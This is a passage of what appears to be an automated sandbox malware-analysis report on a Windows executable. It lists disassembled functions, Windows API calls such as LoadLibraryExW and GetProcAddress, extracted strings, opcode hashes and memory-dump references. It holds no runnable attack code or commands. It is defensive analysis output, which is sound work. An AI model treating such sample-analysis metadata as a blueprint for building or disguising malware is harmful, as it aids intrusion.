                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 45dfc7f00dc9632ed242b6349cf87e240aa27d4f6be10d3660cfae318ddcc709
                                                                                                                                                                                                                                                            • Instruction ID: 9dfc91e0b643ff0b8b8168621ef1689b97bd1324d605cd508c8a7474870964f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45dfc7f00dc9632ed242b6349cf87e240aa27d4f6be10d3660cfae318ddcc709
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA419231B4C663E2FA24FB12A9406BAA391FF89BC4F444431DE5D87BA5DE3CE5458380
                                                                                                                                                                                                                                                            Function 00007FF6404E1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
                                                                                                                                                                                                                                                            • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                            • API String ID: 2030045667-3659356012
                                                                                                                                                                                                                                                            • Opcode ID: 2350b7d1145e8963a43e8e89a63d3c578f396847fa6f05d2074e998f568e28cd
                                                                                                                                                                                                                                                            • Instruction ID: 455708967c697a7a751e8e5b98a73296f6f9c874213de976e6b7dfda8cda0fd9
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2350b7d1145e8963a43e8e89a63d3c578f396847fa6f05d2074e998f568e28cd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8341BF32B4C663E2FA24FB15A9405BA63A0FF84BD4F444432DE5E87BA5EE3CE5418740
                                                                                                                                                                                                                                                            Function 00007FF6404EDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                            • Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                                            • Instruction ID: b7835b3a952e6b23f43904783f28ca2b998240ee58df873890d39408928fee2c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2ED14C32A0CB61DAEB20FB6594403AD77A0FB55798F104235EE8D97B96DF38E581C780
                                                                                                                                                                                                                                                            Function 00007FF6404ECFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED06D
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED07B
                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED0A5
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED113
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF6404ED29A,?,?,?,00007FF6404ECF8C,?,?,?,00007FF6404ECB89), ref: 00007FF6404ED11F
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                            • Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                            • Instruction ID: 0a577c0a8e8f3bba22f2a6c7fa658903c5fe1a473d615a13009d932257db2ec8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B131C221A1EA62E1EE15FB12A9006797394FF49BA8F5E4635DD2D87380EF3CE4468340
                                                                                                                                                                                                                                                            Function 00007FF6404FA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                                                            • Instruction ID: 77a884a90357f97bee4cac1bb6da1c9681f41745507edee62d68497be7733232
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 55a13e5d0c2be300fd0aa5feb7cab341fb5be024435351ef1c8ee5a0da484fed
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30219D24F4C662F2FA68B722564917D218BAF887B0F044734E83ECBBD6DE6CB4108701
                                                                                                                                                                                                                                                            Function 00007FF64050707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                            • Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction ID: eed7c7beb8184f8e67058d578fdfd354db35fab34eed7f0e391e23ce50bf447a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5118E31A1CA6696F754BB02E99472A66A0FB89BE8F040234EA2DC7794DF3CD814C740
                                                                                                                                                                                                                                                            Function 00007FF6404E81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E821D
                                                                                                                                                                                                                                                            • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E827A
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8305
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8364
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E8375
                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,?,00007FF6404E39F2), ref: 00007FF6404E838A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3462794448-0
                                                                                                                                                                                                                                                            • Opcode ID: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                                                                                                                                            • Instruction ID: 034fac8dac3773cf40ee69d2dac4f5db937848fbfd48adeca7cb6d57e4ecc282
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 639de59220823cace7c77af6f37b7d772b01f3b75ea0781fa3cc2fa807537d27
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0419272A1DA92D1EA30FB11A5402BA6394FF89BD4F444139DF5D97789DE3CE401C780
                                                                                                                                                                                                                                                            Function 00007FF6404FA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA5E7
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA61D
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA64A
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA65B
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA66C
                                                                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6404F43FD,?,?,?,?,00007FF6404F979A,?,?,?,?,00007FF6404F649F), ref: 00007FF6404FA687
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                                                                            • Opcode ID: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                                                            • Instruction ID: b64dd40b253b18a8bbe84778933883f3cd32f1fef348ec2b8a951752d4b9c536
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b7c94c1c225e14586273ae0994f3fea44242cff202284b06bfee03021f35fa8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C116D24F4C662E2FA587722565917D228B9F487B4F084734DC7ECB7D6DE2CB4118702
                                                                                                                                                                                                                                                            Function 00007FF6404E2300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                                            • String ID: Unhandled exception in script
                                                                                                                                                                                                                                                            • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                                            • Opcode ID: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                                                                            • Instruction ID: bbc525334e2aa9c077ecc34c495dd18d7bf194e79ba6aa1856a38e0a29ca8308
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f02a126994589ece2bf0b221661227d336c2ada993d2ff489732679099e34b6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80317C32A0DA9299EB24FF61E9552FA6360FF89788F440135EA4D8BB99DF3CD100C700
                                                                                                                                                                                                                                                            Function 00007FF6404E2760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                                                                                                                                                                                                                            • API String ID: 1878133881-640379615
                                                                                                                                                                                                                                                            • Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                            • Instruction ID: 8fdea9c080354823018bc7794959ffe1a56e67eba9726776bf4b4746d7d2f12b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4321517261CA96A1FA24FB10F4517EA6364FF84788F400136EA8C93B99DF7CD645C780
                                                                                                                                                                                                                                                            Function 00007FF6404F8DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                            • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction ID: d4fc5498ea7318f53537cfa785147e5897ce368d805e0ddb2dfcd704c11da3f3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F04F21B1DB12A1FA18BB24A4983796321EF4AB65F540639D97D8A3E4CF2CD549C300
                                                                                                                                                                                                                                                            Function 00007FF640508678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                                                                                                                            • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction ID: 001b1ef2e6aecc85541d158118c28d47e3565e1bfbc7644172781a8234dd8869
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5711B232E1CA2362F65C3128D655B7D1140EF6737CF6A0634EDFE867DA8E2EA8808510
                                                                                                                                                                                                                                                            Function 00007FF6404FA6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6BF
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA6DE
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA706
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA717
                                                                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6404F98B3,?,?,00000000,00007FF6404F9B4E,?,?,?,?,?,00007FF6404F9ADA), ref: 00007FF6404FA728
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
